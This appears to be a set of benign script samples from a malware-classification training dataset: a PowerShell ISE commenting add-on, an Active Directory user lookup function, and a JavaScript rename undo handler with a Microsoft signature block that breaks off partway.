#requires -version 2.0 ## ISE-Comments module v 1.1 ############################################################################################################## ## Provides Comment cmdlets for working with ISE ## ConvertTo-BlockComment - Comments out selected text with <# before and #> after ## ConvertTo-BlockUncomment - Removes <# before and #> after selected text ## ConvertTo-Comment - Comments out selected text with a leeding # on every line ## ConvertTo-Uncomment - Removes leeding # on every line of selected text ## ## Usage within ISE or Microsoft.PowershellISE_profile.ps1: ## Import-Module ISE-Comments.psm1 ## ## Note: The IsePack, a part of the PowerShellPack, also contains a "Toggle Comments" command, ## but it does not support Block Comments ## http://code.msdn.microsoft.com/PowerShellPack ## ############################################################################################################## ## History: ## 1.1 - Minor alterations to work with PowerShell 2.0 RTM and Documentation updates (Hardwick) ## 1.0 - Initial release (Poetter) ############################################################################################################## ## ConvertTo-BlockComment ############################################################################################################## ## Comments out selected text with <# before and #> after ## This code was originaly designed by Jeffrey Snover and was taken from the Windows PowerShell Blog. ## The original function was named ConvertTo-Comment but as it comments out a block I renamed it. ############################################################################################################## function ConvertTo-BlockComment { $editor = $psISE.CurrentFile.Editor $CommentedText = "<#`n" + $editor.SelectedText + "#>" # INSERTING overwrites the SELECTED text $editor.InsertText($CommentedText) } ## ConvertTo-BlockUncomment ############################################################################################################## ## Removes <# before and #> after selected text ############################################################################################################## function ConvertTo-BlockUncomment { $editor = $psISE.CurrentFile.Editor $CommentedText = $editor.SelectedText -replace ("^<#`n", "") $CommentedText = $CommentedText -replace ("#>$", "") # INSERTING overwrites the SELECTED text $editor.InsertText($CommentedText) } ## ConvertTo-Comment ############################################################################################################## ## Comments out selected text with a leeding # on every line ############################################################################################################## function ConvertTo-Comment { $editor = $psISE.CurrentFile.Editor $CommentedText = $editor.SelectedText.Split("`n") # INSERTING overwrites the SELECTED text $editor.InsertText( "#" + ( [String]::Join("`n#", $CommentedText))) } ## ConvertTo-Uncomment ############################################################################################################## ## Comments out selected text with <# before and #> after ############################################################################################################## function ConvertTo-Uncomment { $editor = $psISE.CurrentFile.Editor $CommentedText = $editor.SelectedText.Split("`n") -replace ( "^#", "" ) # INSERTING overwrites the SELECTED text $editor.InsertText( [String]::Join("`n", $CommentedText)) } ############################################################################################################## ## Inserts a submenu Comments to ISE's Custum Menu ## Inserts command Block Comment Selected to submenu Comments ## Inserts command Block Uncomment Selected to submenu Comments ## Inserts command Comment Selected to submenu Comments ## Inserts command Uncomment Selected to submenu Comments ############################################################################################################## if (-not( $psISE.CurrentPowerShellTab.AddOnsMenu.Submenus | where { $_.DisplayName -eq "Comments" } ) ) { $commentsMenu = $psISE.CurrentPowerShellTab.AddOnsMenu.SubMenus.Add("_Comments",$null,$null) $null = $commentsMenu.Submenus.Add("Block Comment Selected", {ConvertTo-BlockComment}, "Ctrl+SHIFT+B") $null = $commentsMenu.Submenus.Add("Block Uncomment Selected", {ConvertTo-BlockUncomment}, "Ctrl+Alt+B") $null = $commentsMenu.Submenus.Add("Comment Selected", {ConvertTo-Comment}, "Ctrl+SHIFT+C") $null = $commentsMenu.Submenus.Add("Uncomment Selected", {ConvertTo-Uncomment}, "Ctrl+Alt+C") } # If you are using IsePack (http://code.msdn.microsoft.com/PowerShellPack) and IseCream (http://psisecream.codeplex.com/), # you can use this code to add your menu items. The added benefits are that you can specify the order of the menu items and # if the shortcut already exists it will add the menu item without the shortcut instead of failing as the default does. # Add-IseMenu -Name "Comments" @{ # "Block Comment Selected" = {ConvertTo-BlockComment}| Add-Member NoteProperty order 1 -PassThru | Add-Member NoteProperty ShortcutKey "Ctrl+SHIFT+B" -PassThru # "Block Uncomment Selected" = {ConvertTo-BlockUncomment}| Add-Member NoteProperty order 2 -PassThru | Add-Member NoteProperty ShortcutKey "Ctrl+Alt+B" -PassThru # "Comment Selected" = {ConvertTo-Comment}| Add-Member NoteProperty order 3 -PassThru | Add-Member NoteProperty ShortcutKey "Ctrl+SHIFT+C" -PassThru # "Uncomment Selected" = {ConvertTo-Uncomment}| Add-Member NoteProperty order 4 -PassThru | Add-Member NoteProperty ShortcutKey "Ctrl+Alt+C" -PassThru # }
combined_dataset/train/non-malicious/Get-User_1.ps1
Get-User_1.ps1
function Get-User($user) { # this function should be passed the CN of the user to be returned $dom = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $root = [ADSI] "LDAP://$($dom.Name)" $searcher = New-Object System.DirectoryServices.DirectorySearcher $root $searcher.filter = "(&(objectCategory=person)(objectClass=user)(cn=$user))" $user = $searcher.FindOne() [System.Collections.Arraylist]$names = $user.Properties.PropertyNames [System.Collections.Arraylist]$props = $user.Properties.Values $userobj = New-Object System.Object for ($i = 0; $i -lt $names.Count) { $userobj | Add-Member -type NoteProperty -Name $($names[$i]) -Value $($props[$i]) $i++ } $userobj.pwdlastset = [System.DateTime]::FromFileTime($userobj.pwdlastset) $userobj.lastlogontimestamp = [System.DateTime]::FromFileTime($userobj.lastlogontimestamp) return $userobj }
combined_dataset/train/non-malicious/sample_48_3.ps1
sample_48_3.ps1
function setName(element, newValue) { this._element = element; this._oldValue = this._element.name; this._newValue = newValue; onDo(); } function getName() { return "element renamed"; } function onDo() { this._element.name = this._newValue; document.elementModified(this._element.id); } function onUndo() { this._element.name = this._oldValue; document.elementModified(this._element.id); } // SIG // Begin signature block // SIG // MIIoNwYJKoZIhvcNAQcCoIIoKDCCKCQCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // 48fq92Z+YtzSPkq/5WJl23G+1Nuhbzno+GznvlR8DYyg // SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA // SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX // SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY // SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw // SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+ // SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm // SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq // SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5 // SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y // SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB // SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd // SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy // SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx // SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw // SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w // SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t // SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB // SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3 // SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo // SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v // SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5 // SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D // SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN // SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI // SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY // SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ // SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/ // SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2 // SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok // SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7 // SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7 // SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW // SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y // SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow // SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL // SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo // SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK // SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT // SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv // SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw // SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG // SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg // SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC // SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq // SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ // SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X // SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL // SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5 // SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt // SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3 // SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP // SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl // SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE // SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9 // SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C // SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp // SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A // SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE // SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB // SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k // SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h // SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy // SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0 // SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv // SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB // SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr // SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp // SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW // SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H // SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS // SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m // SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj // SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO // SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat // SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n // SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA // SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj // SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv // SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3 // SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs // SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991 // SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib // SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x // SIG // ghoKMIIaBgIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG // SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u // SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n // SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G // SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor // SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE // SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCApcf+2ZTq/pLFd // SIG // JpKw1Gh6yL9YMwgbA9/ezr4sGtJUujBCBgorBgEEAYI3 // SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY // SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3 // SIG // DQEBAQUABIIBAEAgs5RB2cqgAUrBFQgcqeuu4HUTW6G5 // SIG // AmlURcq6bn2PmPKVlxwosE/Xa6ihOONmHBjwHmQeJXYo // SIG // Un2/LVj3zfcX/ooR/Vt9j4zYZdjyq9XK7PGMHH5EEhrd // SIG // +JBJTHU8y1y4KZGTABcnVGp7LkqRitqAP5OnGOV9X552 // SIG // Ob6x+8fBbOksrx8EeTLmx4tKBjttz+p8RkC5kPKQpHLy // SIG // KjWhYEGuhujpKeDhVzDR+gVdhBRzxD71md9OmCzruKv9 // SIG // QWB8JHb0obd1ruyb6BtKy+jpDplJ+haBg1MDufwTcF3c // SIG // Nzw3LkulWqlp1+5WlWu/tgHEFrAPYIStZb2xWWV8hIL9 // SIG // S1ahgheUMIIXkAYKKwYBBAGCNwMDATGCF4Awghd8Bgkq // SIG // hkiG9w0BBwKgghdtMIIXaQIBAzEPMA0GCWCGSAFlAwQC // SIG // AQUAMIIBUgYLKoZIhvcNAQkQAQSgggFBBIIBPTCCATkC // SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg // SIG // 5QQoPyBtrd5qLRewxJ6FWYx5Gd03i2bjz+vItOSf7CgC // SIG // BmYzmeP0PxgTMjAyNDA1MDgwNTIxMTMuMDI2WjAEgAIB // SIG // 9KCB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMG // SIG // A1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9u // SIG // czEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkYwMDIt // SIG // MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt // SIG // ZS1TdGFtcCBTZXJ2aWNloIIR6jCCByAwggUIoAMCAQIC // SIG // EzMAAAHyPjLXZKxwkZQAAQAAAfIwDQYJKoZIhvcNAQEL // SIG // BQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp // SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT // SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd // SIG // TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcN // SIG // MjMxMjA2MTg0NTU4WhcNMjUwMzA1MTg0NTU4WjCByzEL // SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x // SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv // SIG // c29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9z // SIG // b2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UECxMe // SIG // blNoaWVsZCBUU1MgRVNOOkYwMDItMDVFMC1EOTQ3MSUw // SIG // IwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2 // SIG // aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKC // SIG // AgEAvOXzyxcKaWIMcGMZEhHmL0AbZ2CU7Sio9hSscx8d // SIG // H4Fel4CCK5glpqSpfSDs7znyf5Ooj9EZ6EaORfPQHdvX // SIG // ncxnZVmwo9UMseR1BzWPMrvRJSTpnYHrjb0yuEVuMLvY // SIG // gef89kngrmKsl/7/M+j6b9vYdbbTVrEnPyjznroc0gF6 // SIG // pANuuQUhU+ZMpMb8wdC8aMUuqFqF1iusMde9jUSUWHCD // SIG // X1w4VEb1Hw+9I4qBPdq1vzoI3DisWZH0MS5cGhUq0pxr // SIG // O14TK6fU7FIJsLMnExDgXRlZn9Rwg+1jms+RBHEMiEtg // SIG // aUWGMLDzGwet7h4idefKjYdUiV7qC+cBg7v22VMzfgc3 // SIG // C4/eosQu8CRkDAYsVh/XfvlfG5ddEWHVw2ZZY0QL0uoh // SIG // cDc62obuA62G+2/DO778IRC9MQjr2+1hTLLLbHF35HRO // SIG // YPjUmnKYYBX3KH7UOajw9jzVZqxt/A5hw6GIYI/bqjyz // SIG // +756F3+4+vi1vFaJ9efA9Fq5pOwrprnEE4h0cnqRGlQ5 // SIG // 5wNhpIiaHof6930oS+gh4D6Ewe6GFP3eiTp3EYqA2Kqk // SIG // X1dsJaSlTvG/lWBy/IZ9dSURceqevZi/AUbUmenRvxhR // SIG // FRPn1ZoMWHyAlK6YIckJREyTyExAUteSLGlLltBr15S0 // SIG // qHxn9reQwKA5Ligmwvt1XT5pWFUCAwEAAaOCAUkwggFF // SIG // MB0GA1UdDgQWBBSVW4cAJurQMQTOXB/AYNPmOuKGeTAf // SIG // BgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf // SIG // BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv // SIG // c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBU // SIG // aW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmwwbAYI // SIG // KwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8v // SIG // d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01p // SIG // Y3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEw // SIG // KDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQM // SIG // MAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAPUunjuB7HwdNF6ToD2m3Dd0G // SIG // XsoqYIpXEEg2fIOlQr/RVR83UqvV6QLJY2UijVkgpYSR // SIG // M+TqN1Jv7Wj56GxfvApAHZHC0IS3ZEoX6/dZM8vbwz6z // SIG // ppQgNhUPY1YRWmrdkDN989afhgj+bbr4qxWlFs1FlQxT // SIG // qaPzucw6c6D2LU69HBYN7l2kS0+eFEN2OLj2F6p+sLp2 // SIG // bVEETIiTM8aVJb3X1hlLQr51t3gwYpA5IsdVxPfFXGCM // SIG // 9vuX3XL6x1XlGqxl8uC0bcM5sKbArVIe7UesIQq1WJG+ // SIG // hbnQXVjO01b44u6RoH43rIJwEmg/woS7seujxsGiGhfs // SIG // S85NGzcbAI9LoXekHVq+k09/Zv0jWdf1F1O5MxKHdLwG // SIG // N5iJ/F+QOCPvf3tZwTaVESemIgykHeWFYMbLmQlr+EMG // SIG // 9Jl4RyHvQrm30qmY7w2sH9iNtvTdy7LQyVEq9bxhQfIk // SIG // OVvGSzOT8E/L7bChAcBxGJsLLlprMZIpiBeQUG0s4PcM // SIG // 9Tuo3Vk8RhtDlLdXF1jjCVCc8hB+FkimRzsed6nALw/Y // SIG // dFOoxBdn7gY7Sf0A61m2+Lq7wH676jZ/ZR+4FT6ZajTw // SIG // yL0PA5Gd5b20LGKpc+te3u+oGu0mNMO9fkD9euQj3c1G // SIG // N+nrdkpuKb7KRCvIZZatyGHMl9L/Pe/l/WHnnDNT29Yw // SIG // ggdxMIIFWaADAgECAhMzAAAAFcXna54Cm0mZAAAAAAAV // SIG // MA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzET // SIG // MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk // SIG // bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0 // SIG // aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0 // SIG // aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAx // SIG // ODIyMjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYT // SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH // SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y // SIG // cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1l // SIG // LVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0BAQEF // SIG // AAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7V // SIG // gtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/H // SIG // ZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY6GB9alKD // SIG // RLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gm // SIG // U3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36M // SIG // EBydUv626GIl3GoPz130/o5Tz9bshVZN7928jaTjkY+y // SIG // OSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoF // SIG // VZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJi // SIG // ss254o2I5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGa // SIG // RnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+Autuqfjbs // SIG // Nkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afo // SIG // mXw/TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9 // SIG // ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk // SIG // i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y // SIG // 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV // SIG // 2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3PmriLq0C // SIG // AwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEw // SIG // IwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/ // SIG // LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJlpxtTNRnp // SIG // cjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8G // SIG // CCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j // SIG // b20vcGtpb3BzL0RvY3MvUmVwb3NpdG9yeS5odG0wEwYD // SIG // VR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9 // SIG // lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoG // SIG // CCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov // SIG // L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS // SIG // b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcN // SIG // AQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/ypb+pc // SIG // FLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHk // SIG // wo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AF // SIG // vonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM9W0jVOR4 // SIG // U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2 // SIG // EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8Atq // SIG // gcKBGUIZUnWKNsIdw2FzLixre24/LAl4FOmRsqlb30mj // SIG // dAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZM // SIG // cm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQE // SIG // cb9k+SS+c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2f // SIG // pCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBM // SIG // drVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L // SIG // +DvktxW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJ // SIG // C4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU // SIG // 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ // SIG // 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDTTCC // SIG // AjUCAQEwgfmhgdGkgc4wgcsxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVyaWNhIE9w // SIG // ZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT // SIG // 